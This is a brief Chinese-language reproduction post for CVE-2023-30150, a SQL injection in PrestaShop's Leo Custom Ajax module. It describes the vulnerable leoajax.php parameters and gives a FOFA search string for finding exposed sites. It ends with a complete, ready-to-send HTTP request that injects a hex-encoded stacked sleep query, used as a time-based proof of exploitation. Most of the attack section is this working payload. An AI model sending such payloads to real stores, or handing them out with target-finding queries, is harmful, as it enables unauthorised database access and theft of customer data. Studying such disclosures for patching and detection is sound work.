PrestaShop购物系统 SQL注入漏洞复现（CVE-2023-30150）

0x01 产品简介

PrestaShop 是一个功能丰富，基于 PHP5 开发的 Web2.0 网上购物系统。PrestaShop 具有可定制，稳定等特点。整个系统只有 5.8MB，易于快速安装。

0x02 漏洞概述

PrestaShop 的部分主题中使用Leo Custom Ajax模块拓展，Leo Custom Ajax模块中可以在/modules/leocustomajax/leoajax.php中使用多个 GET 参数（cat_list、pro_info、pro_add、pro_cdown、pro_color）来操作HTTP请求，使未经身份验证的远程攻击者能够执行 SQL 注入，控制数据库权限获取敏感信息。

0x03 复现环境

FOFA："modules/leocustomajax"

0x04 漏洞复现

PoC

GET /modules/leocustomajax/leoajax.php?cat_list=1%29;select+0x73656c65637420736c6565702835293b+into+@a;prepare+b+from+@a;execute+b;-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/4.0)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

延时5